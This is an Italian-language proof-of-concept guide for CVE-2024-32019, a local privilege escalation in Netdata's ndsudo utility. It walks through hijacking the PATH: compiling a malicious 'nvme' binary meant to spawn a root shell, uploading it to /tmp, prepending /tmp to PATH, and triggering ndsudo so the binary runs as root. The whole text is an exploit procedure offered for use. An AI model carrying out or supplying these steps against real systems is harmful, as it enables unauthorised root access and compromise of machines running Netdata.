
POC per la vulnerabilità ndsudo di netdata - CVE-2024-32019
ndsudo (Exploit locale di Netdata)Questa POC viene utilizzata per sfruttare un'utilità ndsudo vulnerabile inclusa in Netdata per elevare i privilegi locali a root. L'exploit funziona iniettando un binario malevolo nel PATH dell'utente che impersona un comando fidato (nvme) e viene eseguito con privilegi di root da ndsudo.
Hai accesso alla shell locale sul sistema target.
Puoi eseguire il seguente comando ma fallisce con un errore "not found" o simile:
./ndsudo nvme-list
Sulla tua macchina attaccante (o sul sistema vulnerabile se ha un compilatore), compila il binario (ad esempio, dal file poc.c nel repository):
gcc poc.c -o nvme
Questo binario dovrebbe essere progettato per avviare una shell root o eseguire comandi arbitrari con privilegi di root.
Sposta o carica il binario compilato nvme in una directory scrivibile dal tuo utente, come /tmp:
scp nvme user@target:/tmp/
# or use any file upload method you have
Sul sistema target, assicurati che il binario sia eseguibile e anteponi la sua directory al tuo PATH:
chmod +x /tmp/nvme
export PATH=/tmp:$PATH
Questo garantisce che ndsudo risolva ed esegua il tuo nvme malevolo invece di quello legittimo.
ndsudo per eseguire il tuo payloadEsegui il comando vulnerabile per attivare ndsudo:
./ndsudo nvme-list